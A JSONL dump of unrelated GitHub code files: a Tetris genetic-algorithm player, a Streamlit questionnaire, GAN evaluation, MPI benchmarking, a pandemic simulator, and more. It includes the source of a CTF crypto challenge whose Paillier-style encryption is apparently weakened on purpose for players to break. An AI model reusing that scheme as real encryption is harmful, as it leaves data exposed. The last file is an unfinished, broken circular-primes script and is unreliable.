= shapetype + 1\r\n\r\npivotpoints = [[4,2,1,3], #S #I got idea 
of pivot points from tetris rotation video\r\n [3,2,2,3],#T\r\n [3,3,3,3],#I\r\n [3,2,2,3],#Z\r\n [3,2,2,3],#L\r\n [3,3,2,2]#J\r\n]\r\noffsetnormal = [[(0,0),(0,0),(0,0),(0,0)], #tetris rotation video the long\r\n [(0,0),(1,0),(0,0),(-1,0)],\r\n [(0,0),(1,1),(0,0),(-1,1)],\r\n [(0,0),(0,-2),(0,0),(0,-2)],\r\n [(0,0),(1,-2),(0,0),(-1,-2)]]\r\n\r\noffsetI = [[(0,0),(-1,0),(-1,-1),(0,-1)], #also from the long video\r\n [(-1,0),(0,0),(1,-1),(0,-1)],\r\n [(2,0),(0,0),(-2,-1),(0,-1)],\r\n [(-1,0),(0,-1),(1,0),(0,1)],\r\n [(2,0),(0,2),(-2,0),(0,-2)]]\r\n#print(offsetnormal[0][0][0])\r\nnextshapes = []\r\nholdshapes = []\r\nfor x in range(4):\r\n if nextshape == 0 or nextshape == 3:\r\n nextshapes.append(canvas.create_image((shapepoints[0][nextshape][x] % 4 + 10.5) * size,(shapepoints[0][nextshape][x] // 4 + 10)* size,anchor=NW,image= shapesimg[nextshape]))\r\n else:\r\n nextshapes.append(\r\n canvas.create_image((shapepoints[0][nextshape][x] % 4 + 11) * size, (shapepoints[0][nextshape][x] // 4 + 10) * size,\r\n anchor=NW, image=shapesimg[nextshape]))\r\n#start()\r\ncanvas.create_text(500,600,font=\"Times 20 italic bold\",\r\n text=\"Level\")\r\ncanvas.create_text(500,700,font=\"Times 20 italic bold\",\r\n text=\"Score\")\r\nimagenext = ImageTk.PhotoImage(Image.open(\"next.jpg\"))\r\ncanvas.create_image(500,320,image=imagenext)\r\nimagehold = ImageTk.PhotoImage(Image.open(\"hold.jpg\"))\r\ncanvas.create_image(500,50,image=imagehold)\r\nwin.after(int(delay),downinput,False)\r\n#print(board)\r\n\r\npopsize = 50 ##########################################I wish I spent more time on this AI. It would've been cool but I spent soooo much time bugfixing the game also this is taken from video\r\ngeneration = 1 #took from AI video\r\nmutrate = 0.02\r\ndata = {} #look uped how to do JSON file stuff\r\nstartboard = np.zeros((boardheight,boardwidth))\r\ngenerationindex = 0 #Took from video\r\nmaxmoves = 500 #took\r\nfitness = 0 #took\r\nparents = []\r\nfit = 0\r\ndef createchildren(): #took this method\r\n global data\r\n usechildren = False\r\n data['population'] = []\r\n if usechildren:\r\n usechild()\r\n else:\r\n for x in range(popsize): #this loop has stuff from the AI website and video\r\n data['population'].append({\r\n 'id': random.random(), #video\r\n 'generation': generation, #video\r\n 'rowsfilled': random.random(), #video\r\n 'totalheightcols': random.random() - 0.5, #website\r\n 'numholes': random.random() - 0.5, #website\r\n 'rigidness': random.random() - 0.5, #both\r\n 'fitness': 0\r\n })\r\n with open('data.json', 'w') as outfile:\r\n json.dump(data, outfile, indent=1)\r\n evaluate()\r\n\r\ndef usechild():\r\n global data,generation\r\n for x in range(5):\r\n data['population'].append({\r\n 'id': 0.8836908404702061,\r\n 'generation': 26,\r\n 'rowsfilled': 0.030591430497130742,\r\n 'totalheightcols': 0.006961037706044365,\r\n 'numholes': 0.0205583135684244,\r\n 'rigidness': -0.007101190397666102,\r\n 'fitness': 0\r\n })\r\n data['population'].append({\r\n 'id': 0.4660794728013691,\r\n 'generation': 33,\r\n 'rowsfilled': 0.03370574434981557,\r\n 'totalheightcols': 0.024891259604550138,\r\n 'numholes': 0.000688213250719727,\r\n 'rigidness': 0.020569918960131953,\r\n 'fitness': 0\r\n })\r\n with open('data.json', 'w') as outfile:\r\n json.dump(data, outfile, indent=1)\r\n #for x in range(50):\r\n evaluate()\r\n\r\n\r\ndef ai(event):\r\n moveblocks()\r\n\r\nwin.bind(\"a\", ai)\r\ndef getrowsfilled():\r\n return totalrowsfilled + 1\r\n\r\ndef gettotalheightcols(): #this method is taken from the 
website's source code\r\n totalheight = 0\r\n for x in range(boardwidth):\r\n for y in range(boardheight):\r\n if board[y][x] < 0:\r\n totalheight += 1\r\n return totalheight\r\ndef getnumholes(): #this method is also taken from source code\r\n numholes = 0\r\n for y in range(boardwidth):\r\n hashole = False\r\n for x in range(boardheight):\r\n if board[x][y] < 0:\r\n hashole = True\r\n elif board[x][y] == 0 and hashole:\r\n numholes += 1\r\n return numholes\r\n\r\ndef getrigidness(): #taken from website also\r\n\r\n def getcolheight(col):\r\n height = 0\r\n for x in range(boardheight):\r\n if board[x][col] < 0:\r\n height += 1\r\n return height\r\n\r\n rigidness = 0\r\n for x in range(boardwidth-1):\r\n rigidness += abs(getcolheight(x) - getcolheight(x + 1))\r\n return rigidness\r\ndef getallmoves():\r\n global board,shapes,dy,dx,fx,fxx,degree,score,fitness,shapeboard\r\n moverating = 0 #Takaen from website\r\n bestmove = -69696969 #taken from website\r\n testboard = board.copy() #stackoverflow\r\n testshapes = shapes.copy() #same as above\r\n savedscore = score\r\n fitness = score\r\n moveset = []\r\n # print(moveset.shape)\r\n for rotations in range(4): #this whole loop is taken from AI video\r\n for x in range(-5,6):\r\n board = testboard.copy()\r\n for k in range(rotations):\r\n rotate()\r\n # print(board)\r\n if x < 0:\r\n for i in range(abs(x)):\r\n leftinput()\r\n # print(board)\r\n elif x > 0:\r\n for j in range(x):\r\n rightinput()\r\n # print(board)\r\n while valid(1):\r\n downinput(True)\r\n #print(board)\r\n moverating += getrowsfilled() * rowsfilled\r\n moverating += gettotalheightcols() * totalheightcols\r\n moverating += getnumholes() * numholes\r\n moverating += getrigidness() * rigidness\r\n if not gameplaying:\r\n moverating -= 500\r\n if moverating > bestmove:\r\n bestmove = moverating\r\n moveset = [rotations,x]\r\n # print(bestmove)\r\n moverating = 0\r\n #print(bestmove)\r\n #print(board)\r\n board = testboard.copy()\r\n dy = 0#this is reset feature that I kinda took and recoded\r\n dx = 0 #\r\n fxx = np.array([0,0]) #\r\n fx = np.array([0,0]) #\r\n degree = 0 #\r\n shapeboard = np.ndarray((boardheight, boardwidth), dtype=PhotoImage) #\r\n score = savedscore\r\n # shapes = testshapes\r\n #newshape(False)\r\n #print(moveset)\r\n return moveset\r\ndef moveblocks():\r\n moves = getallmoves()\r\n for r in range(int(moves[0])):\r\n rotate()\r\n for x in range(abs(int(moves[1]))):\r\n #print(moves[1])\r\n if moves[1] < 0:\r\n leftinput()\r\n elif moves[1] > 0:\r\n rightinput()\r\n while valid(1):\r\n downinput(True)\r\n newshape(False)\r\ndef restartgame(): #idea taken from AI video\r\n global board,dy,dx,fxx,fx,degree,gameplaying,score,shapeboard\r\n board = startboard.copy()\r\n dy = 0\r\n dx = 0\r\n fxx = np.array([0, 0])\r\n fx = np.array([0, 0])\r\n degree = 0\r\n score = 0\r\n gameplaying = True\r\n shapeboard = np.ndarray((boardheight, boardwidth), dtype=PhotoImage)\r\n#def mutate():\r\n # if random.random < mutrate\r\ndef mate(): #taken from video\r\n def getrandomparengenes(): #from AI video\r\n num = random.randint(0,1)\r\n if num == 1:\r\n return 1\r\n else:\r\n return 0\r\n\r\n global data,fit\r\n yourmom = []\r\n yourdad = []\r\n mychildren = []\r\n with open(\"data.json\", \"r\") as p:\r\n temp = json.load(p)\r\n for x in range(popsize): ##Idea came from video but I couldn't code it myself\r\n print(x - 1 + (generation - 2) * 10)\r\n if int(temp['population'][x + (generation - 2) * 10]['fitness']) > fit:\r\n fit = int(temp['population'][x + (generation - 2) * 
10]['fitness'])\r\n print(fit)\r\n parents.append(x - 1 + (generation - 2) * 10)\r\n for x in range(popsize):#writing json stuff from stackoverflow\r\n temp['population'].append({\r\n 'id': random.random(),\r\n 'generation': generation,\r\n 'rowsfilled': temp['population'][len(parents) - 1 - getrandomparengenes()]['rowsfilled'] * mutrate,\r\n 'totalheightcols': temp['population'][len(parents) - 1 - getrandomparengenes()]['totalheightcols'] * mutrate,\r\n 'numholes': temp['population'][len(parents) - 1 - getrandomparengenes()]['numholes'] * mutrate,\r\n 'rigidness': temp['population'][len(parents) - 1 - getrandomparengenes()]['rigidness'] * mutrate,\r\n 'fitness': 0\r\n })\r\n #print(temp['population'][x+10])\r\n with open(\"data.json\", \"w\") as p: #stackoverflow\r\n json.dump(temp, p,indent=1)\r\n print(parents)\r\n data = temp\r\n\r\ndef evaluate():\r\n global rowsfilled,totalheightcols,numholes,rigidness,data,fitness,generationindex,generation\r\n # print(shapeboard)\r\n if generationindex % popsize == 0 and generationindex != 0:\r\n print(\"Generation done\")\r\n generation += 1\r\n mate()\r\n if generation == 500:\r\n return\r\n print(\"Poplation\" + str(generationindex))\r\n\r\n fitness = 0\r\n rowsfilled = float(data['population'][generationindex]['rowsfilled'])\r\n totalheightcols = float(data['population'][generationindex]['totalheightcols'])\r\n numholes = float(data['population'][generationindex]['numholes'])\r\n rigidness = float(data['population'][generationindex]['rigidness'])\r\n while gameplaying:\r\n moveblocks()\r\n restartgame()\r\n with open(\"data.json\", \"r\") as p: # #stackoverflow/website reading json file\r\n tempdata = json.load(p)\r\n # print(tempdata['population'][generationindex])\r\n\r\n tempdata['population'][generationindex]['fitness'] = fitness\r\n with open(\"data.json\", \"w\") as p:\r\n json.dump(tempdata, p,indent=1)\r\n data = tempdata\r\n print(tempdata['population'][generationindex]['fitness'])\r\n generationindex += 1\r\n evaluate()\r\nrowsfilled = 0 #variables from AI video and website\r\ntotalheightcols = 0\r\nnumholes = 0\r\nrigidness = 0\r\n\r\n#createchildren()\r\nwin.mainloop()","repo_name":"BokChoyBoys/Tetris","sub_path":"Tester.py","file_name":"Tester.py","file_ext":"py","file_size_in_byte":28639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37221440628","text":"# This is the questionnaire page (to be completed)\n\nimport streamlit as st\nimport questionnaire_data as qd\n\n\ndef app(container, status):\n\n # Only run this if the app is in the questionnaire phase\n if status == 0:\n # Introduction\n container.markdown('
Sustainable investment suggestions in 2 steps', unsafe_allow_html=True)\n        container.markdown('We know that finding suitable sustainable stocks to invest in can be a daunting task. That’s why we offer GreenBear. Fill in your preferred sectors and priorities and we will provide you with a list of stocks to match. Start below:', unsafe_allow_html=True)\n        # question container\n        questions = container.beta_container()\n\n        # Question 1: select industries\n        questions.markdown('STEP 1. Select sectors you have affinity with:', unsafe_allow_html=True)\n\n        # Option 1: load categories from csv file\n        sector_industries = qd.load_sectors_industries_csv('data/company_industry_sector.csv', 1, 3, 7)\n        selected_sectors = []\n\n        # split sectors into 3 lists for 3 columns\n        s1, s2, s3 = qd.split_list(sector_industries, 3)\n        # split into 3 columns\n        c1, c2, c3 = questions.beta_columns(3)\n        # Add a checkbox for each sector\n        #category_boxes = [questions.checkbox(sector, key=sector) for sector in [sector_industries[x][0] for x in range(len(sector_industries))]]\n\n        check1 = [c1.checkbox(s, key=s) for s in [s1[x][0] for x in range(len(s1))]]\n        check2 = [c2.checkbox(s, key=s) for s in [s2[x][0] for x in range(len(s2))]]\n        check3 = [c3.checkbox(s, key=s) for s in [s3[x][0] for x in range(len(s3))]]\n\n        category_boxes = [check1, check2, check3]\n        # Question 2: select sustainability priorities\n        questions.markdown('STEP 2. Select your sustainability priorities:
', unsafe_allow_html=True)\n # Add options for question 2\n selected_priority = questions.radio('',['Environmental sustainability',\n 'Social sustainability', 'Governance sustainability', 'Total sustainability'])\n\n # Translate selected option to table column name\n if selected_priority == 'Environmental sustainability':\n selected_priority = 'environmentScore'\n elif selected_priority == 'Social sustainability':\n selected_priority = 'socialScore'\n elif selected_priority == 'Governance sustainability':\n selected_priority = 'governanceScore'\n elif selected_priority == 'Total sustainability':\n selected_priority = 'totalEsg'\n\n # Add confirm button\n if questions.button('Confirm Selection'):\n questions.write('Selection confirmed')\n selected_sectors = [sector for sector, checked in zip([sector[0] for sector in sector_industries], category_boxes) if checked]\n selected_industries = qd.get_industries_from_sectors(sector_industries, selected_sectors)\n\n # If the confirm button is clicked return status 1, so that the\n # app moves on to the results\n return selected_industries, selected_priority, 1\n else:\n return [], '', 0\n","repo_name":"DSCS-A4/sustainability","sub_path":"questionnaire.py","file_name":"questionnaire.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73738379450","text":"import logging\nimport operator\n\nimport itertools\nimport os\nimport numpy as np\nfrom typing import Tuple\n\nimport torch\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\nfrom functools import reduce\n\nfrom data_loader import (\n AmericanNationalCorpusDataset,\n ObliterateLetters,\n ToTensor,\n)\nfrom src.discriminator_net import DiscriminatorNet\nfrom src.generator_net import GeneratorNet\n\n\ndef load_models(args, config, device='cpu') -> Tuple[\n GeneratorNet, DiscriminatorNet]:\n generator = GeneratorNet(config).to(device)\n generator.load_state_dict(\n torch.load(\n os.path.join(\n args.path_to_checkpoints,\n f'epoch_{args.epoch_num}_generator.pt'\n ),\n map_location=device\n )\n )\n generator.eval()\n\n discriminator = DiscriminatorNet(config).to(device)\n discriminator.load_state_dict(\n torch.load(\n os.path.join(\n args.path_to_checkpoints,\n f'epoch_{args.epoch_num}_discriminator.pt'\n ),\n map_location=device\n )\n )\n discriminator.eval()\n\n return generator, discriminator\n\n\ndef show_examples(args, config, device='cpu', shuffle=False):\n generator, _ = load_models(args, config, device=device)\n\n noisy_phrases = AmericanNationalCorpusDataset(\n config,\n transform_raw_phrase=ObliterateLetters(\n obliterate_ratio=config['replace_with_noise_probability']\n ),\n transform_sample_dict=ToTensor()\n )\n\n noisy_data_loader = DataLoader(\n noisy_phrases,\n batch_size=1,\n num_workers=1,\n shuffle=shuffle\n )\n\n with torch.no_grad():\n for x in itertools.islice(noisy_data_loader, 5):\n _input = x['concat_phrase'].to(device)\n out = generator.forward(_input).cpu()\n print('#' * 40)\n print(noisy_phrases.show(x['raw_phrase']))\n print(noisy_phrases.show(out))\n print('#' * 40)\n\n\ndef measure_accuracy(generator, real_data_loader, fake_data_loader, device):\n correct = 0\n elements = 0\n with torch.no_grad():\n for fake_batch, real_batch in tqdm(\n zip(fake_data_loader, real_data_loader)\n ):\n _input = fake_batch['concat_phrase'].to(device)\n output = generator.forward(_input)\n\n correct += np.sum(\n np.argmax(output.detach().cpu().numpy(), axis=-1)\n == 
np.argmax(real_batch['raw_phrase'].numpy(), axis=-1)\n )\n elements += reduce(\n operator.mul,\n real_batch['raw_phrase'].shape[:-1],\n 1\n )\n # logging.debug(f'{correct} {elements} {correct / elements}')\n return correct / elements\n\n\ndef eval_with_mean_accuracy(args, config, device):\n noisy_phrases = AmericanNationalCorpusDataset(\n config,\n transform_raw_phrase=ObliterateLetters(\n obliterate_ratio=config['replace_with_noise_probability']\n ),\n transform_sample_dict=ToTensor()\n )\n real_phrases = AmericanNationalCorpusDataset(\n config,\n transform_raw_phrase=None,\n transform_sample_dict=ToTensor()\n )\n test_noisy_data_loader = DataLoader(\n noisy_phrases,\n batch_size=config['batch_size'],\n num_workers=config['num_workers'],\n shuffle=False\n )\n test_real_data_loader = DataLoader(\n real_phrases,\n batch_size=config['batch_size'],\n num_workers=config['num_workers'],\n shuffle=False\n )\n generator, _ = load_models(args, config, device)\n acc = measure_accuracy(\n generator,\n test_real_data_loader,\n test_noisy_data_loader,\n device\n )\n print(f'Mean Accuracy: {acc:.2f}')\n","repo_name":"kkulczak/phrases_reconstruction_GAN","sub_path":"src/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":3804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38167085802","text":"#!/usr/bin/env python3\n#\n# Polymero\n#\n\n# Imports\nimport random\nfrom Crypto.Util.number import GCD, inverse, bytes_to_long, long_to_bytes, getPrime\nfrom time import sleep\n\n\nclass Pravrallier:\n def __init__(self):\n # Keygen\n while True:\n p, q = getPrime(512), getPrime(512)\n if GCD(p*q, (p-1)*(q-1)) == 1:\n break\n self.n = p * q\n # Blinding\n self.r = { r+1 : random.randint(2, self.n-1) for r in range(128) }\n self.i = 1\n\n def fortune(self, msg):\n \"\"\" Generate fortune ticket flavour text. \"\"\"\n nums = [int.from_bytes(msg[i:i+2],'big') for i in range(0,len(msg),2)]\n luck = ['']\n spce = b'\\x30\\x00'.decode('utf-16-be')\n for num in nums:\n if num >= 0x4e00 and num <= 0x9fd6:\n luck[-1] += num.to_bytes(2,'big').decode('utf-16-be')\n else:\n luck += ['']\n luck += ['']\n maxlen = max([len(i) for i in luck])\n for i in range(len(luck)):\n luck[i] += spce * (maxlen - len(luck[i]))\n card = [spce.join([luck[::-1][i][j] for i in range(len(luck))]) for j in range(maxlen)]\n return card\n\n def encrypt_worry(self, msg):\n # Generate fortune ticket\n card = self.fortune(msg)\n # Encrypt\n gm = pow(1 + self.n, bytes_to_long(msg), self.n**2)\n rn = pow(self.r[len(card[0])] * self.i, self.n + self.i, self.n**2)\n cip = (gm * rn) % self.n**2 \n self.i += 1\n return cip, card\n\n def encrypt_flag(self, msg, order, txt):\n # Generate fortune ticket\n card = self.fortune(msg)\n # Encrypt up to given order\n cip = bytes_to_long(msg)\n for o in range(2,order+1):\n cip = pow(1 + self.n, cip, self.n**(o))\n # ???\n print(\"| {}\".format(txt[(o-2) % len(txt)]))\n sleep(3)\n return cip, card\n\n def print_card(self, cip, card):\n \"\"\" Print fortune ticket to terminal. 
\"\"\"\n upper_hex = long_to_bytes(cip).hex().upper()\n fwascii = list(''.join([(ord(i)+65248).to_bytes(2,'big').decode('utf-16-be') for i in list(upper_hex)]))\n enclst = [''.join(fwascii[i:i+len(card[0])]) for i in range(0, len(fwascii), len(card[0]))]\n # Frame elements\n sp = b'\\x30\\x00'.decode('utf-16-be')\n dt = b'\\x30\\xfb'.decode('utf-16-be')\n hl = b'\\x4e\\x00'.decode('utf-16-be')\n vl = b'\\xff\\x5c'.decode('utf-16-be')\n # Print fortune ticket\n enclst[-1] += sp*(len(card[0])-len(enclst[-1]))\n print()\n print(2*sp + dt + hl*(len(card[0])+2) + dt)\n print(2*sp + vl + dt + hl*len(card[0]) + dt + vl)\n for row in card:\n print(2*sp + 2*vl + row + 2*vl)\n print(2*sp + vl + dt + hl*len(card[0]) + dt + vl)\n for row in enclst:\n print(2*sp + vl + sp + row + sp + vl)\n print(2*sp + dt + hl*(len(card[0])+2) + dt)\n print()\n","repo_name":"sajjadium/ctf-archives","sub_path":"ctfs/K3RN3L/2021/crypto/Shrine_of_the_Sweating_Buddha/pravrallier.py","file_name":"pravrallier.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","stars":490,"dataset":"github-code","pt":"77"} +{"seq_id":"15499868162","text":"#!/usr/bin/python3\nimport pandas as pd\nimport requests\nimport datetime\nfrom django.http import JsonResponse\n\n\n\"\"\"\nHere we can add / remove our desired target websites before creating csv!\n\"\"\"\nwebsite_lists=[\"https://www.google.com\",\"https://dma.org/\",\n \"https://pandas.pydata.org/\",\"https://github.com/\",\"https://console.aiven.io/\"\n ,'https://www.kaggle.com/','https://www.theconstructsim.com/',\n 'https://grabcad.com/library/','https://medium.com/','http://gordonua.com/','https://www.5.ua/',\n 'https://humanrights.org.ua/','http://www.example.com'\n ]\n\n\ndef lst_to_csv(csv_file_name,list):#for producer\n print(\"This python function create csv file from list!\")\n df=pd.DataFrame(website_lists)\n return df.to_csv(f'{csv_file_name}',header=['target_websites'],index=False)\n\n\ndef monitor_(url):#for producer\n print(\"we are in website monitoring function\")\n req_ = requests.get(url)\n respTime = round(req_.elapsed.total_seconds(),2)\n return respTime,req_.status_code\n \n\n\n\n","repo_name":"Phoowainyein/web-monitoring","sub_path":"functionality.py","file_name":"functionality.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18272929937","text":"from setuptools import setup, find_packages\n\n__version__ = \"0.2.1\"\n\ninstall_requires = [\n 'docker-py',\n]\n\nsetup(\n name=\"dockermachinepy\",\n version=__version__,\n packages=find_packages(),\n install_requires=install_requires,\n package_data={\n '': ['*.rst'],\n },\n author=\"Gijs Molenaar\",\n author_email=\"gijs@pythonic.nl\",\n description=\"Python wrapper around docker-machine\",\n license=\"GPL2\",\n keywords=\"docker machine docker-machine container\",\n url=\"https://github.com/thomasopsomer/pydm\"\n)\n","repo_name":"thomasopsomer/pydm","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29741007811","text":"from view.View import *\nfrom PyQt5 import QtCore, QtWidgets\nfrom PyQt5.QtWidgets import QMainWindow, QLabel, QWidget, QApplication\nfrom model.Simulation import *\nfrom presenter.Constants import *\nfrom model.Constants import *\n\nclass Presenter(QtCore.QObject):\n def __init__(self):\n super(Presenter, 
self).__init__()\n self.particle_size = DEFAULT_PARTICLE_SIZE\n self.simulation = None\n self.ui = View()\n self.connect_signals()\n\n # simulation not active at start.\n self.active = False\n\n self.fps = DEFAULT_FPS\n self.speed = DEFAULT_SPEED\n\n self.init_timers()\n\n def connect_signals(self):\n self.ui.play_pause_simulation_signal.connect(self.play_pause_simulation)\n self.ui.reset_simulation_signal.connect(self.reset_simulation)\n self.ui.export_data_signal.connect(self.start_export)\n self.ui.fps_changed_signal.connect(self.update_fps)\n self.ui.speed_changed_signal.connect(self.update_speed)\n self.ui.stepsize_changed_signal.connect(self.update_stepsize)\n self.ui.movement_changed_signal.connect(self.update_movement_type)\n self.ui.measures_changed_signal.connect(self.update_measures)\n self.ui.resize_signal.connect(self.adapt_simulation_dimensions)\n\n\n def init_graph_plots(self):\n data = self.simulation.statistics.get_live_data()\n self.ui.init_plotting_data(data[1],data[2])\n\n def init_timers(self):\n self.create_fps_timer()\n self.create_simulation_timer()\n\n def init_simulation(self):\n self.simulation = Simulation(*self.ui.get_simulation_parameters(), *self.ui.get_simulation_dimensions(), particle_size=self.particle_size)\n\n # if particles in particle input bigger than maximum particle count, then make particle count to max particle count.\n max_particles = self.simulation.get_maximum_particle_count()-1\n if self.ui.get_particle_count() > max_particles:\n self.ui.set_particle_count(max_particles)\n self.simulation.particle_count = max_particles\n\n\n if self.ui.correct_infection_count():\n self.simulation.infected_count = self.ui.get_infected_count()\n\n self.ui.set_particle_size(self.particle_size)\n self.init_graph_plots()\n self.update_stepsize()\n self.update_movement_type()\n self.simulation.set_measures(self.ui.get_measure_parameters(self.simulation.particle_count))\n if self.timer == None:\n self.create_simulation_timer()\n self.create_fps_timer()\n\n self.ui.toggle_non_changeable_fields()\n\n def adapt_simulation_dimensions(self):\n if self.simulation != None:\n self.pause_simulation()\n self.simulation.set_dimensions(*self.ui.get_simulation_dimensions())\n self.play_simulation()\n\n def create_fps_timer(self):\n self.timer = QtCore.QTimer(self)\n self.timer.timeout.connect(self.gui_mainloop)\n self.update_fps()\n self.timer.start(1000 // self.fps)\n\n def create_simulation_timer(self):\n self.sim_timer = QtCore.QTimer(self)\n self.sim_timer.timeout.connect(self.simulation_mainloop)\n self.update_speed()\n self.sim_timer.start(1000 // (60*self.speed))\n\n def update_speed(self):\n self.speed = self.ui.get_speed()\n self.sim_timer.stop()\n self.sim_timer.start(1000 // (60*self.speed))\n\n def update_fps(self):\n newfps = self.ui.get_fps()\n if newfps > 0:\n self.fps = newfps\n if self.active:\n self.timer.stop()\n self.timer.start(1000 // self.fps)\n\n def play_pause_simulation(self):\n if self.active == False:\n self.play_simulation()\n else:\n self.pause_simulation()\n\n def pause_simulation(self):\n self.ui.startBtn.setText(\"Play\")\n self.active = False\n\n def play_simulation(self):\n self.ui.startBtn.setText(\"Pause\")\n if self.simulation == None:\n self.init_simulation()\n\n self.active = True\n\n def reset_simulation(self):\n if self.simulation != None:\n self.ui.toggle_non_changeable_fields()\n self.simulation = None\n self.ui.reset_simulation_routine()\n self.pause_simulation()\n\n\n def update_stepsize(self):\n if self.simulation != None:\n 
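# (Editor's note) Pause-modify-resume: the simulation QTimer keeps firing
# while the stepsize changes, so the update that follows is bracketed by
# pause_simulation()/play_simulation() to avoid ticking mid-change.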
new_stepsize = self.ui.get_stepsize()\n was_active = self.active\n if was_active:\n self.pause_simulation()\n self.simulation.change_stepsize(new_stepsize)\n if was_active:\n self.play_simulation()\n\n def simulation_mainloop(self):\n if self.active:\n self.simulation.tick()\n if self.simulation.statistics.check_simulation_finished():\n self.gui_mainloop()\n self.pause_simulation()\n self.ui.simulation_end()\n\n def gui_mainloop(self, oneframe=False):\n if self.active or oneframe: # if simulation is active or one frame update is needed.\n if self.ui.check_diseases_updated(self.simulation.diseases):\n self.ui.draw_mutations(self.simulation.diseases[0], self.simulation.diseases)\n self.ui.update_status_labels(*self.simulation.get_status_counts())\n if self.simulation.tick_counter % self.fps // 4 == 0:\n self.ui.update_graph(*self.simulation.statistics.get_live_data())\n\n self.ui.draw(self.simulation.particles, self.simulation.targets)\n\n def start_export(self):\n if self.simulation != None:\n self.ui.export(*self.simulation.statistics.get_export_data(self.ui.get_granularity()))\n else:\n print(\"No data to export yet. Start Simulation to get data.\")\n\n def update_movement_type(self):\n if self.simulation != None:\n new_movement = self.ui.get_movement_type()\n self.simulation.set_movement(new_movement)\n if new_movement == Movement.DIRECTED:\n self.simulation.add_target(*self.ui.get_target_coordinates())\n\n def update_measures(self):\n self.simulation.set_measures(self.ui.get_measure_parameters(self.simulation.particle_count))\n if self.active == False and self.simulation != None: # render one frame if simulation is paused and measures are changed\n self.gui_mainloop(True)","repo_name":"Elias-W1/pandemic-simulator","sub_path":"presenter/Presenter.py","file_name":"Presenter.py","file_ext":"py","file_size_in_byte":6415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31220252327","text":"import subprocess\r\nimport os\r\nfrom time import sleep\r\nsubprocess.Popen(['make','clean'])\r\nsleep(2)\r\nsubprocess.Popen(['make'])\r\nsleep(2)\r\nf1 = open(\"output.Bcast\",\"w\")\r\nf2 = open(\"output.Gather\",\"w\")\r\nf3 = open(\"output.Reduce\",\"w\")\r\nf4 = open(\"output.Alltoallv\",\"w\")\r\n# running the code\r\nfor e in range(10):\r\n for P in [4,16]: #number of nodes\r\n for ppn in [1,8]: \r\n subprocess.Popen([os.path.expanduser('~/UGP/allocator/src/allocator.out'),str(P*ppn),str(ppn)],stdout=subprocess.DEVNULL)\r\n sleep(2)\r\n for D in [16,256,2048]:\r\n try:\r\n temp = subprocess.check_output(['mpiexec', '-np', str(P*ppn),\"-hostfile\",\"hosts\",'./src', str(D) ],timeout=200) \r\n except:\r\n try:\r\n temp = subprocess.check_output(['mpiexec', '-np', str(P*ppn),\"-hostfile\",\"hostsimproved\",'./src', str(D) ],timeout=200)\r\n except:\r\n break\r\n temp = temp.decode(\"utf-8\") \r\n temp = temp.split('\\n')\r\n print('ok')\r\n print(str(e)+','+str(P)+','+str(ppn)+\",\"+str(D)+' '+temp[0],file=f1)\r\n print(str(e)+','+str(P)+','+str(ppn)+\",\"+str(D)+' '+temp[1],file=f2)\r\n print(str(e)+','+str(P)+','+str(ppn)+\",\"+str(D)+' '+temp[2],file=f3)\r\n print(str(e)+','+str(P)+','+str(ppn)+\",\"+str(D)+' '+temp[3],file=f4)\r\nf1.close()\r\nf2.close()\r\nf3.close()\r\nf4.close()\r\n\r\nfor collective in ['Bcast','Gather','Reduce','Alltoallv']:\r\n subprocess.Popen(['python3','plot.py',collective])\r\nprint(\"plots 
complete\")\r\n","repo_name":"tharwani/cs633","sub_path":"Assignment2/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3879560434","text":"import math\r\ndef prime(number) :\r\n loop=2\r\n while loop*loop<=number :\r\n if number%loop == 0:\r\n return False\r\n loop += 1\r\n return True\r\ndef primeNumbers(start, end) :\r\n primeList = []\r\n for i in range(start,end) :\r\n if prime(i) :\r\n primeList.append(i)\r\n return primeList\r\ndef checkCircular(number) :\r\n count = len(str(number))\r\n while True :\r\n if int(((math.pow(10, count - 1)) * (number % 10))+ (number / 10) ) == number : \r\n return True\r\n return False\r\nstart = 2\r\nend = 1000000\r\nloopCount = 0\r\ncircularPrime = []\r\nprimeList = primeNumbers(start,end)\r\nprint (primeList)\r\n\"\"\"\r\nfor i in primeList :\r\n if checkCircular(i) :\r\n circularPrime.append(i)\r\nprint (\"loopCount=\",loopCount)\r\nprint (circularPrime)\r\nprint (len(circularPrime))\r\nprint (primeList)\r\n# not completed\r\n\"\"\"\r\n\"\"\"\r\n\r\n\r\nThe number, 197, is called a circular prime because all rotations of the digits: 197, 971, and 719, are themselves prime.\r\n\r\nThere are thirteen such primes below 100: 2, 3, 5, 7, 11, 13, 17, 31, 37, 71, 73, 79, and 97.\r\n\r\nHow many circular primes are there below one million?\r\n\r\n\"\"\"\r\n\r\n# Test case , might work\r\n\"\"\"\r\nimport math\r\ndef prime(number) :\r\n loop=2\r\n while loop*loop<=number :\r\n if number%loop == 0:\r\n return False\r\n loop += 1\r\n return True\r\ndef primeNumbers(start, end) :\r\n primeList = []\r\n for i in range(start,end) :\r\n if prime(i) :\r\n primeList.append(i)\r\n return primeList\r\n\t\r\n# Function to check if the number is \r\n# circular prime or not. \r\ndef checkCircular(N) :\r\n #Count digits. \r\n\tcount = 0\r\n\ttemp = N \r\n\twhile (temp > 0) : \r\n\t\tcount = count + 1\r\n\t\ttemp = temp / 10\r\n num = N\r\n\twhile True : \r\n\t\t\r\n\t\t# Following three lines generate the \r\n\t\t# next circular permutation of a \r\n\t\t# number. We move last digit to \r\n\t\t# first position. \r\n\t\trem = num % 10\r\n\t\tdiv = num / 